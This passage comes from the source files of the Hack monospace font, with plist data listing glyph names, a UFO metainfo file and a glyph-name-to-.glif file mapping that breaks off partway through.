<string>uni259E</string> <string>uni259F</string> <string>ltshade</string> <string>shade</string> <string>dkshade</string> <string>uni25CF</string> <string>circle</string> <string>uni25EF</string> <string>uni25D0</string> <string>uni25D1</string> <string>uni25D2</string> <string>uni25D3</string> <string>uni25D6</string> <string>uni25D7</string> <string>uni25D4</string> <string>uni25D5</string> <string>uni25F4</string> <string>uni25F5</string> <string>uni25F6</string> <string>uni25F7</string> <string>uni25CD</string> <string>uni25CC</string> <string>uni25C9</string> <string>uni25CE</string> <string>openbullet</string> <string>invbullet</string> <string>invcircle</string> <string>uni25DA</string> <string>uni25DB</string> <string>uni25E0</string> <string>uni25E1</string> <string>uni25DC</string> <string>uni25DD</string> <string>uni25DE</string> <string>uni25DF</string> <string>uni25C6</string> <string>uni25C7</string> <string>uni2B16</string> <string>uni2B17</string> <string>uni2B18</string> <string>uni2B19</string> <string>uni25C8</string> <string>lozenge</string> <string>uni25B0</string> <string>uni25B1</string> <string>uni25AE</string> <string>filledrect</string> <string>uni25AD</string> <string>uni25AF</string> <string>uni250C</string> <string>uni2514</string> <string>uni2510</string> <string>uni2518</string> <string>uni253C</string> <string>uni252C</string> <string>uni2534</string> <string>uni251C</string> <string>uni2524</string> <string>uni2500</string> <string>uni2502</string> <string>uni2561</string> <string>uni2562</string> <string>uni2556</string> <string>uni2555</string> <string>uni2563</string> <string>uni2551</string> <string>uni2557</string> <string>uni255D</string> <string>uni255C</string> <string>uni255B</string> <string>uni255E</string> <string>uni255F</string> <string>uni255A</string> <string>uni2554</string> <string>uni2569</string> <string>uni2566</string> <string>uni2560</string> <string>uni2550</string> <string>uni256C</string> <string>uni2567</string> <string>uni2568</string> <string>uni2564</string> <string>uni2565</string> <string>uni2559</string> <string>uni2558</string> <string>uni2552</string> <string>uni2553</string> <string>uni256B</string> <string>uni256A</string> <string>filledbox</string> <string>uni25A1</string> <string>uni25A2</string> <string>uni25A3</string> <string>uni2B1A</string> <string>uni25A4</string> <string>uni25A5</string> <string>uni25A6</string> <string>uni25A7</string> <string>uni25A8</string> <string>uni25A9</string> <string>uni25AA</string> <string>uni25AB</string> <string>uni25E7</string> <string>uni25E8</string> <string>uni25E9</string> <string>uni25EA</string> <string>uni25EB</string> <string>uni25F0</string> <string>uni25F1</string> <string>uni25F2</string> <string>uni25F3</string> <string>uni25FB</string> <string>uni25FC</string> <string>uni25FD</string> <string>uni25FE</string> <string>triagup</string> <string>uni25B6</string> <string>triagdn</string> <string>uni25C0</string> <string>uni25B3</string> <string>uni25B7</string> <string>uni25BD</string> <string>uni25C1</string> <string>uni25EC</string> <string>uni25ED</string> <string>uni25EE</string> <string>triagrt</string> <string>triaglf</string> <string>uni25BB</string> <string>uni25C5</string> <string>uni25B4</string> <string>uni25B8</string> <string>uni25BE</string> <string>uni25C2</string> <string>uni25B5</string> <string>uni25B9</string> <string>uni25BF</string> <string>uni25C3</string> <string>uni25E5</string> <string>uni25E2</string> <string>uni25E3</string> <string>uni25E4</string> <string>uni25F9</string> <string>uni25FF</string> <string>uni25FA</string> <string>uni25F8</string> <string>uni2501</string> <string>uni2503</string> <string>uni2504</string> <string>uni2505</string> <string>uni2506</string> <string>uni2507</string> <string>uni2508</string> <string>uni2509</string> <string>uni250A</string> <string>uni250B</string> <string>uni250D</string> <string>uni250E</string> <string>uni250F</string> <string>uni2511</string> <string>uni2512</string> <string>uni2513</string> <string>uni2515</string> <string>uni2516</string> <string>uni2517</string> <string>uni2519</string> <string>uni251A</string> <string>uni251B</string> <string>uni251D</string> <string>uni251E</string> <string>uni251F</string> <string>uni2520</string> <string>uni2521</string> <string>uni2522</string> <string>uni2523</string> <string>uni2525</string> <string>uni2526</string> <string>uni2527</string> <string>uni2528</string> <string>uni2529</string> <string>uni252A</string> <string>uni252B</string> <string>uni252D</string> <string>uni252E</string> <string>uni252F</string> <string>uni2530</string> <string>uni2531</string> <string>uni2532</string> <string>uni2533</string> <string>uni2535</string> <string>uni2536</string> <string>uni2537</string> <string>uni2538</string> <string>uni2539</string> <string>uni253A</string> <string>uni253B</string> <string>uni253D</string> <string>uni253E</string> <string>uni253F</string> <string>uni2540</string> <string>uni2541</string> <string>uni2542</string> <string>uni2543</string> <string>uni2544</string> <string>uni2545</string> <string>uni2546</string> <string>uni2547</string> <string>uni2548</string> <string>uni2549</string> <string>uni254A</string> <string>uni254B</string> <string>uni254C</string> <string>uni254D</string> <string>uni254E</string> <string>uni254F</string> <string>uni256D</string> <string>uni256E</string> <string>uni256F</string> <string>uni2570</string> <string>uni2571</string> <string>uni2572</string> <string>uni2573</string> <string>uni2574</string> <string>uni2575</string> <string>uni2576</string> <string>uni2577</string> <string>uni2578</string> <string>uni2579</string> <string>uni257A</string> <string>uni257B</string> <string>uni257C</string> <string>uni257D</string> <string>uni257E</string> <string>uni257F</string> <string>bar</string> <string>brokenbar</string> <string>at</string> <string>ampersand</string> <string>paragraph</string> <string>copyright</string> <string>registered</string> <string>section</string> <string>trademark</string> <string>degree</string> <string>asciicircum</string> <string>dagger</string> <string>daggerdbl</string> <string>acutecomb</string> <string>dotbelowcomb</string> <string>gravecomb</string> <string>hookabovecomb</string> <string>tildecomb</string> <string>uni0302</string> <string>uni0304</string> <string>uni0305</string> <string>uni0306</string> <string>uni0307</string> <string>uni0308</string> <string>uni030A</string> <string>uni030B</string> <string>uni030C</string> <string>uni030D</string> <string>uni030E</string> <string>uni030F</string> <string>uni0310</string> <string>uni0311</string> <string>uni0312</string> <string>uni0313</string> <string>uni0314</string> <string>uni0315</string> <string>uni0316</string> <string>uni0317</string> <string>uni0318</string> <string>uni0319</string> <string>uni031A</string> <string>uni031B</string> <string>uni031C</string> <string>uni031D</string> <string>uni031E</string> <string>uni031F</string> <string>uni0320</string> <string>uni0321</string> <string>uni0322</string> <string>uni0324</string> <string>uni0325</string> <string>uni0326</string> <string>uni0327</string> <string>uni0328</string> <string>uni0329</string> <string>uni032A</string> <string>uni032B</string> <string>uni032C</string> <string>uni032D</string> <string>uni032E</string> <string>uni032F</string> <string>uni0330</string> <string>uni0331</string> <string>uni0332</string> <string>uni0333</string> <string>uni0334</string> <string>uni0335</string> <string>uni0336</string> <string>uni0337</string> <string>uni0338</string> <string>uni0339</string> <string>uni033A</string> <string>uni033B</string> <string>uni033C</string> <string>uni033D</string> <string>uni033E</string> <string>uni033F</string> <string>uni0358</string> <string>uni0361</string> <string>uni0306.case</string> <string>uni0311.case</string> <string>uni030F.case</string> <string>uni0307.case</string> <string>uni030B.case</string> <string>uni0304.case</string> <string>uni02B9</string> <string>uni02BB</string> <string>uni02BC</string> <string>uni02BD</string> <string>uni02BE</string> <string>uni02BF</string> <string>uni02C0</string> <string>uni02C1</string> <string>uni02C8</string> <string>uni02C9</string> <string>uni02CC</string> <string>uni02CD</string> <string>uni02CE</string> <string>uni02CF</string> <string>uni02D0</string> <string>uni02D1</string> <string>acute</string> <string>breve</string> <string>caron</string> <string>cedilla</string> <string>circumflex</string> <string>dieresis</string> <string>dotaccent</string> <string>grave</string> <string>hungarumlaut</string> <string>macron</string> <string>ogonek</string> <string>ring</string> <string>tilde</string> <string>uni0559</string> <string>uni2C7D</string> <string>A</string> <string>c6459</string> <string>c6460</string> <string>c6461</string> <string>c6468</string> <string>c6470</string> <string>c6472</string> <string>c6477</string> <string>c6478</string> <string>c6475</string> <string>c6476</string> <string>Alpha</string> <string>Beta</string> <string>Gamma</string> <string>Epsilon</string> <string>Zeta</string> <string>Eta</string> <string>Theta</string> <string>Iota</string> <string>Kappa</string> <string>Lambda</string> <string>Mu</string> <string>Nu</string> <string>Xi</string> <string>Omicron</string> <string>Pi</string> <string>Rho</string> <string>Sigma</string> <string>Tau</string> <string>Upsilon</string> <string>Phi</string> <string>Chi</string> <string>Psi</string> <string>uni03A9</string> <string>Alphatonos</string> <string>Epsilontonos</string> <string>Etatonos</string> <string>Iotatonos</string> <string>Omicrontonos</string> <string>Upsilontonos</string> <string>Omegatonos</string> <string>Iotadieresis</string> <string>Upsilondieresis</string> <string>alpha</string> <string>beta</string> <string>gamma</string> <string>delta</string> <string>epsilon</string> <string>zeta</string> <string>eta</string> <string>theta</string> <string>iota</string> <string>kappa</string> <string>lambda</string> <string>nu</string> <string>xi</string> <string>omicron</string> <string>pi</string> <string>rho</string> <string>uni03C2</string> <string>sigma</string> <string>tau</string> <string>upsilon</string> <string>phi</string> <string>chi</string> <string>psi</string> <string>omega</string> <string>iotatonos</string> <string>iotadieresis</string> <string>iotadieresistonos</string> <string>upsilontonos</string> <string>upsilondieresis</string> <string>upsilondieresistonos</string> <string>omicrontonos</string> <string>omegatonos</string> <string>alphatonos</string> <string>epsilontonos</string> <string>etatonos</string> <string>zero.subs</string> <string>one.subs</string> <string>two.subs</string> <string>three.subs</string> <string>four.subs</string> <string>five.subs</string> <string>six.subs</string> <string>seven.subs</string> <string>eight.subs</string> <string>nine.subs</string> <string>uni2155</string> <string>uni2156</string> <string>uni2157</string> <string>uni2158</string> <string>uni2159</string> <string>uni215A</string> <string>uni2150</string> <string>uni2151</string> <string>uni2070</string> <string>guillemotleft</string> <string>guillemotright</string> <string>uni00B5</string> <string>uni2206</string> <string>tonos</string> <string>dieresistonos</string> <string>_1550</string> <string>Aacute</string> <string>periodcentered</string> <string>Ccircumflex</string> <string>ccircumflex</string> <string>Gcircumflex</string> <string>gcircumflex</string> <string>Hcircumflex</string> <string>hcircumflex</string> <string>Jcircumflex</string> <string>jcircumflex</string> <string>Scircumflex</string> <string>scircumflex</string> <string>Ubreve</string> <string>ubreve</string> <string>uni20B7</string> <string>uni2116</string> <string>uni01A4</string> <string>uni1EBC</string> <string>uni1EBD</string> <string>uni1EF8</string> <string>uni1EF9</string> <string>IJ</string> <string>ij</string> <string>Ldot</string> <string>ldot</string> <string>uni0162</string> <string>uni0163</string> <string>kgreenlandic</string> <string>musicalnote</string> <string>napostrophe</string> <string>uniE0A0</string> <string>uniE0A1</string> <string>uniE0A2</string> <string>uniE0B0</string> <string>uniE0B1</string> <string>uniE0B2</string> <string>uniE0B3</string> <string>uniFEFF</string> </array> </dict> </plist>
Hack/source/Hack-Italic.ufo/metainfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>creator</key> <string>com.schriftgestaltung.GlyphsUFOExport</string> <key>formatVersion</key> <integer>2</integer> </dict> </plist>
Hack/source/Hack-Italic.ufo/glyphs/contents.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>.notdef</key> <string>_notdef.glif</string> <key>A</key> <string>A_.glif</string> <key>AE</key> <string>A_E_.glif</string> <key>Aacute</key> <string>A_acute.glif</string> <key>Abreve</key> <string>A_breve.glif</string> <key>Acircumflex</key> <string>A_circumflex.glif</string> <key>Adieresis</key> <string>A_dieresis.glif</string> <key>Agrave</key> <string>A_grave.glif</string> <key>Alpha</key> <string>A_lpha.glif</string> <key>Alphatonos</key> <string>A_lphatonos.glif</string> <key>Amacron</key> <string>A_macron.glif</string> <key>Aogonek</key> <string>A_ogonek.glif</string> <key>Aring</key> <string>A_ring.glif</string> <key>Atilde</key> <string>A_tilde.glif</string> <key>B</key> <string>B_.glif</string> <key>Beta</key> <string>B_eta.glif</string> <key>C</key> <string>C_.glif</string> <key>CR</key> <string>C_R_.glif</string> <key>Cacute</key> <string>C_acute.glif</string> <key>Ccaron</key> <string>C_caron.glif</string> <key>Ccedilla</key> <string>C_cedilla.glif</string> <key>Ccircumflex</key> <string>C_circumflex.glif</string> <key>Cdotaccent</key> <string>C_dotaccent.glif</string> <key>Chi</key> <string>C_hi.glif</string> <key>D</key> <string>D_.glif</string> <key>Dcaron</key> <string>D_caron.glif</string> <key>Dcroat</key> <string>D_croat.glif</string> <key>E</key> <string>E_.glif</string> <key>Eacute</key> <string>E_acute.glif</string> <key>Ecaron</key> <string>E_caron.glif</string> <key>Ecircumflex</key> <string>E_circumflex.glif</string> <key>Edieresis</key> <string>E_dieresis.glif</string> <key>Edotaccent</key> <string>E_dotaccent.glif</string> <key>Egrave</key> <string>E_grave.glif</string> <key>Emacron</key> <string>E_macron.glif</string> <key>Eng</key> <string>E_ng.glif</string> <key>Eogonek</key> <string>E_ogonek.glif</string> <key>Epsilon</key> <string>E_psilon.glif</string> <key>Epsilontonos</key> <string>E_psilontonos.glif</string> <key>Eta</key> <string>E_ta.glif</string> <key>Etatonos</key> <string>E_tatonos.glif</string> <key>Eth</key> <string>E_th.glif</string> <key>Euro</key> <string>E_uro.glif</string> <key>F</key> <string>F_.glif</string> <key>G</key> <string>G_.glif</string> <key>Gamma</key> <string>G_amma.glif</string> <key>Gbreve</key> <string>G_breve.glif</string> <key>Gcaron</key> <string>G_caron.glif</string> <key>Gcircumflex</key> <string>G_circumflex.glif</string> <key>Gdotaccent</key> <string>G_dotaccent.glif</string> <key>H</key> <string>H_.glif</string> <key>Hbar</key> <string>H_bar.glif</string> <key>Hcircumflex</key> <string>H_circumflex.glif</string> <key>I</key> <string>I_.glif</string> <key>IJ</key> <string>I_J_.glif</string> <key>Iacute</key> <string>I_acute.glif</string> <key>Icircumflex</key> <string>I_circumflex.glif</string> <key>Idieresis</key> <string>I_dieresis.glif</string> <key>Idotaccent</key> <string>I_dotaccent.glif</string> <key>Igrave</key> <string>I_grave.glif</string> <key>Imacron</key> <string>I_macron.glif</string> <key>Iogonek</key> <string>I_ogonek.glif</string> <key>Iota</key> <string>I_ota.glif</string> <key>Iotadieresis</key> <string>I_otadieresis.glif</string> <key>Iotatonos</key> <string>I_otatonos.glif</string> <key>Itilde</key> <string>I_tilde.glif</string> <key>J</key> <string>J_.glif</string> <key>Jcircumflex</key> <string>J_circumflex.glif</string> <key>K</key> <string>K_.glif</string> <key>Kappa</key> <string>K_appa.glif</string> <key>L</key> <string>L_.glif</string> <key>Lacute</key> <string>L_acute.glif</string> <key>Lambda</key> <string>L_ambda.glif</string> <key>Lcaron</key> <string>L_caron.glif</string> <key>Ldot</key> <string>L_dot.glif</string> <key>longs</key> <string>longs.glif</string> <key>Lslash</key> <string>L_slash.glif</string> <key>M</key> <string>M_.glif</string> <key>Mu</key> <string>M_u.glif</string> <key>N</key> <string>N_.glif</string> <key>NULL</key> <string>N_U_L_L_.glif</string> <key>Nacute</key> <string>N_acute.glif</string> <key>Ncaron</key> <string>N_caron.glif</string> <key>Ntilde</key> <string>N_tilde.glif</string> <key>Nu</key> <string>N_u.glif</string> <key>O</key> <string>O_.glif</string> <key>OE</key> <string>O_E_.glif</string> <key>Oacute</key> <string>O_acute.glif</string> <key>Ocircumflex</key> <string>O_circumflex.glif</string> <key>Odieresis</key> <string>O_dieresis.glif</string> <key>Ograve</key> <string>O_grave.glif</string> <key>Ohorn</key> <string>O_horn.glif</string> <key>Ohungarumlaut</key> <string>O_hungarumlaut.glif</string> <key>Omacron</key> <string>O_macron.glif</string> <key>Omegatonos</key> <string>O_megatonos.glif</string> <key>Omicron</key> <string>O_micron.glif</string> <key>Omicrontonos</key> <string>O_microntonos.glif</string> <key>Oslash</key> <string>O_slash.glif</string> <key>Oslashacute</key> <string>O_slashacute.glif</string> <key>Otilde</key> <string>O_tilde.glif</string> <key>P</key> <string>P_.glif</string> <key>Phi</key> <string>P_hi.glif</string> <key>Pi</key> <string>P_i.glif</string> <key>Psi</key> <string>P_si.glif</string> <key>Q</key> <string>Q_.glif</string> <key>R</key> <string>R_.glif</string> <key>Racute</key> <string>R_acute.glif</string> <key>Rcaron</key> <string>R_caron.glif</string> <key>Rho</key> <string>R_ho.glif</string> <key>S</key> <string>S_.glif</string> <key>Sacute</key> <string>S_acute.glif</string> <key>Scaron</key> <string>S_caron.glif</string> <key>Scedilla</key> <string>S_cedilla.glif</string> <key>Scircumflex</key> <string>S_circumflex.glif</string> <key>Sigma</key> <string>S_igma.glif</string> <key>T</key> <string>T_.glif</string> <key>Tau</key> <string>T_au.glif</string> <key>Tbar</key> <string>T_bar.glif</string> <key>Tcaron</key> <string>T_caron.glif</string> <key>Theta</key> <string>T_heta.glif</string> <key>Thorn</key> <string>T_horn.glif</string> <key>U</key> <string>U_.glif</string> <key>Uacute</key> <string>U_acute.glif</string> <key>Ubreve</key> <string>U_breve.glif</string> <key>Ucircumflex</key> <string>U_circumflex.glif</string> <key>Udieresis</key> <string>U_dieresis.glif</string> <key>Ugrave</key> <string>U_grave.glif</string> <key>Uhorn</key> <string>U_horn.glif</string> <key>Uhungarumlaut</key> <string>U_hungarumlaut.glif</string> <key>Umacron</key> <string>U_macron.glif</string> <key>Uogonek</key> <string>U_ogonek.glif</string> <key>Upsilon</key> <string>U_psilon.glif</string> <key>Upsilondieresis</key> <string>U_psilondieresis.glif</string> <key>Upsilontonos</key> <string>U_psilontonos.glif</string> <key>Uring</key> <string>U_ring.glif</string> <key>Utilde</key> <string>U_tilde.glif</string> <key>V</key> <string>V_.glif</string> <key>W</key> <string>W_.glif</string> <key>Wacute</key> <string>W_acute.glif</string> <key>Wcircumflex</key> <string>W_circumflex.glif</string> <key>Wdieresis</key> <string>W_dieresis.glif</string> <key>Wgrave</key> <string>W_grave.glif</string> <key>X</key> <string>X_.glif</string> <key>Xi</key> <string>X_i.glif</string> <key>Y</key> <string>Y_.glif</string> <key>Yacute</key> <string>Y_acute.glif</string> <key>Ycircumflex</key> <string>Y_circumflex.glif</string> <key>Ydieresis</key> <string>Y_dieresis.glif</string> <key>Ygrave</key> <string>Y_grave.glif</string> <key>Z</key> <string>Z_.glif</string> <key>Zacute</key> <string>Z_acute.glif</string> <key>Zcaron</key> <string>Z_caron.glif</string> <key>Zdotaccent</key> <string>Z_dotaccent.glif</string> <key>Zeta</key> <string>Z_eta.glif</string> <key>_1550</key> <string>_1550.glif</string> <key>a</key> <string>a.glif</string> <key>aacute</key> <string>aacute.glif</string> <key>abreve</key> <string>abreve.glif</string> <key>acircumflex</key> <string>acircumflex.glif</string> <key>acute</key> <string>acute.glif</string> <key>acutecomb</key> <string>acutecomb.glif</string> <key>adieresis</key> <string>adieresis.glif</string> <key>ae</key> <string>ae.glif</string> <key>agrave</key> <string>agrave.glif</string> <key>alpha</key> <string>alpha.glif</string> <key>alphatonos</key> <string>alphatonos.glif</string> <key>amacron</key> <string>amacron.glif</string> <key>ampersand</key> <string>ampersand.glif</string> <key>angle</key> <string>angle.glif</string> <key>aogonek</key> <string>aogonek.glif</string> <key>approxequal</key> <string>approxequal.glif</string> <key>aring</key> <string>aring.glif</string> <key>arrowboth</key> <string>arrowboth.glif</string> <key>arrowdblboth</key> <string>arrowdblboth.glif</string> <key>arrowdbldown</key> <string>arrowdbldown.glif</string> <key>arrowdblleft</key> <string>arrowdblleft.glif</string> <key>arrowdblright</key> <string>arrowdblright.glif</string> <key>arrowdblup</key> <string>arrowdblup.glif</string> <key>arrowdown</key> <string>arrowdown.glif</string> <key>arrowleft</key> <string>arrowleft.glif</string> <key>arrowright</key> <string>arrowright.glif</string> <key>arrowup</key> <string>arrowup.glif</string> <key>arrowupdn</key> <string>arrowupdn.glif</string> <key>arrowupdnbse</key> <string>arrowupdnbse.glif</string> <key>asciicircum</key> <string>asciicircum.glif</string> <key>asciitilde</key> <string>asciitilde.glif</string> <key>asterisk</key> <string>asterisk.glif</string> <key>asteriskmath</key> <string>asteriskmath.glif</string> <key>at</key> <string>at.glif</string> <key>atilde</key> <string>atilde.glif</string> <key>b</key> <string>b.glif</string> <key>backslash</key> <string>backslash.glif</string> <key>bar</key> <string>bar.glif</string> <key>beta</key> <string>beta.glif</string> <key>block</key> <string>block.glif</string> <key>braceleft</key> <string>braceleft.glif</string> <key>braceright</key> <string>braceright.glif</string> <key>bracketleft</key> <string>bracketleft.glif</string> <key>bracketright</key> <string>bracketright.glif</string> <key>breve</key> <string>breve.glif</string> <key>brokenbar</key> <string>brokenbar.glif</string> <key>bullet</key> <string>bullet.glif</string> <key>c</key> <string>c.glif</string> <key>c6459</key> <string>c6459.glif</string> <key>c6460</key> <string>c6460.glif</string> <key>c6461</key> <string>c6461.glif</string> <key>c6468</key> <string>c6468.glif</string> <key>c6470</key> <string>c6470.glif</string> <key>c6472</key> <string>c6472.glif</string> <key>c6475</key> <string>c6475.glif</string> <key>c6476</key> <string>c6476.glif</string> <key>c6477</key> <string>c6477.glif</string> <key>c6478</key> <string>c6478.glif</string> <key>cacute</key> <string>cacute.glif</string> <key>caron</key> <string>caron.glif</string> <key>carriagereturn</key> <string>carriagereturn.glif</string> <key>ccaron</key> <string>ccaron.glif</string> <key>ccedilla</key> <string>ccedilla.glif</string> <key>ccircumflex</key> <string>ccircumflex.glif</string> <key>cdotaccent</key> <string>cdotaccent.glif</string> <key>cedilla</key> <string>cedilla.glif</string> <key>cent</key> <string>cent.glif</string> <key>chi</key> <string>chi.glif</string> <key>circle</key> <string>circle.glif</string> <key>circlemultiply</key> <string>circlemultiply.glif</string> <key>circleplus</key> <string>circleplus.glif</string> <key>circumflex</key> <string>circumflex.glif</string> <key>colon</key> <string>colon.glif</string> <key>colonmonetary</key> <string>colonmonetary.glif</string> <key>comma</key> <string>comma.glif</string> <key>congruent</key> <string>congruent.glif</string> <key>copyright</key> <string>copyright.glif</string> <key>currency</key> <string>currency.glif</string> <key>d</key> <string>d.glif</string> <key>dagger</key> <string>dagger.glif</string> <key>daggerdbl</key> <string>daggerdbl.glif</string> <key>dcaron</key> <string>dcaron.glif</string> <key>dcroat</key> <string>dcroat.glif</string> <key>degree</key> <string>degree.glif</string> <key>delta</key> <string>delta.glif</string> <key>dieresis</key> <string>dieresis.glif</string> <key>dieresistonos</key> <string>dieresistonos.glif</string> <key>divide</key> <string>divide.glif</string> <key>dkshade</key> <string>dkshade.glif</string> <key>dnblock</key> <string>dnblock.glif</string> <key>dollar</key> <string>dollar.glif</string> <key>dong</key> <string>dong.glif</string> <key>dotaccent</key> <string>dotaccent.glif</string> <key>dotbelowcomb</key> <string>dotbelowcomb.glif</string> <key>dotlessi</key> <string>dotlessi.glif</string> <key>dotmath</key> <string>dotmath.glif</string> <key>e</key> <string>e.glif</string> <key>eacute</key> <string>eacute.glif</string> <key>ecaron</key> <string>ecaron.glif</string> <key>ecircumflex</key> <string>ecircumflex.glif</string> <key>edieresis</key> <string>edieresis.glif</string> <key>edotaccent</key> <string>edotaccent.glif</string> <key>egrave</key> <string>egrave.glif</string> <key>eight</key> <string>eight.glif</string> <key>eight.subs</key> <string>eight.subs.glif</string> <key>element</key> <string>element.glif</string> <key>onedotenleader</key> <string>onedotenleader.glif</string> <key>twodotenleader</key> <string>twodotenleader.glif</string> <key>ellipsis</key> <string>ellipsis.glif</string> <key>emacron</key> <string>emacron.glif</string> <key>Ebreve</key> <string>E_breve.glif</string> <key>ebreve</key> <string>ebreve.glif</string> <key>emdash</key> <string>emdash.glif</string> <key>emptyset</key> <string>emptyset.glif</string> <key>endash</key> <string>endash.glif</string> <key>eng</key> <string>eng.glif</string> <key>eogonek</key> <string>eogonek.glif</string> <key>epsilon</key> <string>epsilon.glif</string> <key>epsilontonos</key> <string>epsilontonos.glif</string> <key>equal</key> <string>equal.glif</string> <key>equivalence</key> <string>equivalence.glif</string> <key>eta</key> <string>eta.glif</string> <key>etatonos</key> <string>etatonos.glif</string> <key>eth</key> <string>eth.glif</string> <key>exclam</key> <string>exclam.glif</string> <key>exclamdbl</key> <string>exclamdbl.glif</string> <key>exclamdown</key> <string>exclamdown.glif</string> <key>exclamdown.case</key> <string>exclamdown.case.glif</string> <key>existential</key> <string>existential.glif</string> <key>f</key> <string>f.glif</string> <key>figuredash</key> <string>figuredash.glif</string> <key>filledbox</key> <string>filledbox.glif</string> <key>filledrect</key> <string>filledrect.glif</string> <key>five</key> <string>five.glif</string> <key>five.subs</key> <string>five.subs.glif</string> <key>fiveeighths</key> <string>fiveeighths.glif</string> <key>florin</key> <string>florin.glif</string> <key>four</key> <string>four.glif</string> <key>four.subs</key> <string>four.subs.glif</string> <key>franc</key> <string>franc.glif</string> <key>g</key> <string>g.glif</string> <key>gamma</key> <string>gamma.glif</string> <key>gbreve</key> <string>gbreve.glif</string> <key>gcaron</key> <string>gcaron.glif</string> <key>gcircumflex</key> <string>gcircumflex.glif</string> <key>gdotaccent</key> <string>gdotaccent.glif</string> <key>germandbls</key> <string>germandbls.glif</string> <key>gradient</key> <string>gradient.glif</string> <key>grave</key> <string>grave.glif</string> <key>gravecomb</key> <string>gravecomb.glif</string> <key>greater</key> <string>greater.glif</string> <key>greaterequal</key> <string>greaterequal.glif</string> <key>guillemotleft</key> <string>guillemotleft.glif</string> <key>guillemotright</key> <string>guillemotright.glif</string> <key>guilsinglleft</key> <string>guilsinglleft.glif</string> <key>guilsinglright</key> <string>guilsinglright.glif</string> <key>h</key> <string>h.glif</string> <key>hbar</key> <string>hbar.glif</string> <key>hcircumflex</key> <string>hcircumflex.glif</string> <key>hookabovecomb</key> <string>hookabovecomb.glif</string> <key>hungarumlaut</key> <string>hungarumlaut.glif</string> <key>hyphen</key> <string>hyphen.glif</string> <key>i</key> <string>i.glif</string> <key>iacute</key> <string>iacute.glif</string> <key>icircumflex</key> <string>icircumflex.glif</string> <key>idieresis</key> <string>idieresis.glif</string> <key>igrave</key> <string>igrave.glif</string> <key>ij</key> <string>ij.glif</string> <key>imacron</key> <string>imacron.glif</string> <key>Ibreve</key> <string>I_breve.glif</string> <key>ibreve</key> <string>ibreve.glif</string> <key>infinity</key> <string>infinity.glif</string> <key>integral</key> <string>integral.glif</string> <key>integralbt</key> <string>integralbt.glif</string> <key>integraltp</key> <string>integraltp.glif</string> <key>intersection</key> <string>intersection.glif</string> <key>invbullet</key> <string>invbullet.glif</string> <key>invcircle</key> <string>invcircle.glif</string> <key>iogonek</key> <string>iogonek.glif</string> <key>iota</key> <string>iota.glif</string> <key>iotadieresis</key> <string>iotadieresis.glif</string> <key>iotadieresistonos</key> <string>iotadieresistonos.glif</string> <key>iotatonos</key> <string>iotatonos.glif</string> <key>itilde</key> <string>itilde.glif</string> <key>j</key> <string>j.glif</string> <key>jcircumflex</key> <string>jcircumflex.glif</string> <key>k</key> <string>k.glif</string> <key>kappa</key> <string>kappa.glif</string> <key>kgreenlandic</key> <string>kgreenlandic.glif</string> <key>l</key> <string>l.glif</string> <key>lacute</key> <string>lacute.glif</string> <key>lambda</key> <string>lambda.glif</string> <key>lcaron</key> <string>lcaron.glif</string> <key>ldot</key> <string>ldot.glif</string> <key>less</key> <string>less.glif</string> <key>lessequal</key> <string>lessequal.glif</string> <key>lfblock</key> <string>lfblock.glif</string> <key>lira</key> <string>lira.glif</string> <key>logicaland</key> <string>logicaland.glif</string> <key>logicalnot</key> <string>logicalnot.glif</string> <key>logicalor</key> <string>logicalor.glif</string> <key>lozenge</key> <string>lozenge.glif</string> <key>lslash</key> <string>lslash.glif</string> <key>ltshade</key> <string>ltshade.glif</string> <key>m</key> <string>m.glif</string> <key>macron</key> <string>macron.glif</string> <key>minus</key> <string>minus.glif</string> <key>multiply</key> <string>multiply.glif</string> <key>musicalnote</key> <string>musicalnote.glif</string> <key>n</key> <string>n.glif</string> <key>nacute</key> <string>nacute.glif</string> <key>napostrophe</key> <string>napostrophe.glif</string> <key>ncaron</key> <string>ncaron.glif</string> <key>nine</key> <string>nine.glif</string> <key>nine.subs</key> <string>nine.subs.glif</string> <key>notelement</key> <string>notelement.glif</string> <key>notequal</key> <string>notequal.glif</string> <key>notsubset</key> <string>notsubset.glif</string> <key>ntilde</key> <string>ntilde.glif</string> <key>nu</key> <string>nu.glif</string> <key>numbersign</key> <string>numbersign.glif</string> <key>o</key> <string>o.glif</string> <key>oacute</key> <string>oacute.glif</string> <key>ocircumflex</key> <string>ocircumflex.glif</string> <key>odieresis</key> <string>odieresis.glif</string> <key>oe</key> <string>oe.glif</string> <key>ogonek</key> <string>ogonek.glif</string> <key>ograve</key> <string>ograve.glif</string> <key>ohorn</key> <string>ohorn.glif</string> <key>ohungarumlaut</key> <string>ohungarumlaut.glif</string> <key>omacron</key> <string>omacron.glif</string> <key>Obreve</key> <string>O_breve.glif</string> <key>obreve</key> <string>obreve.glif</string> <key>omega</key> <string>omega.glif</string> <key>omegatonos</key> <string>omegatonos.glif</string> <key>omicron</key> <string>omicron.glif</string> <key>omicrontonos</key> <string>omicrontonos.glif</string> <key>one</key> <string>one.glif</string> <key>one.subs</key> <string>one.subs.glif</string> <key>oneeighth</key> <string>oneeighth.glif</string> <key>onehalf</key> <string>onehalf.glif</string> <key>onequarter</key> <string>onequarter.glif</string> <key>openbullet</key> <string>openbullet.glif</string> <key>ordfeminine</key> <string>ordfeminine.glif</string> <key>ordmasculine</key> <string>ordmasculine.glif</string> <key>orthogonal</key> <string>orthogonal.glif</string> <key>oslash</key> <string>oslash.glif</string> <key>oslashacute</key> <string>oslashacute.glif</string> <key>otilde</key> <string>otilde.glif</string> <key>p</key> <string>p.glif</string> <key>paragraph</key> <string>paragraph.glif</string> <key>parenleft</key> <string>parenleft.glif</string> <key>parenright</key> <string>parenright.glif</string> <key>partialdiff</key> <string>partialdiff.glif</string> <key>percent</key> <string>percent.glif</string> <key>period</key> <string>period.glif</string> <key>periodcentered</key> <string>periodcentered.glif</string> <key>perthousand</key> <string>perthousand.glif</string> <key>peseta</key> <string>peseta.glif</string> <key>phi</key> <string>phi.glif</string> <key>pi</key> <string>pi.glif</string> <key>plus</key> <string>plus.glif</string> <key>plusminus</key> <string>plusminus.glif</string> <key>product</key> <string>product.glif</string> <key>propersubset</key> <string>propersubset.glif</string> <key>propersuperset</key> 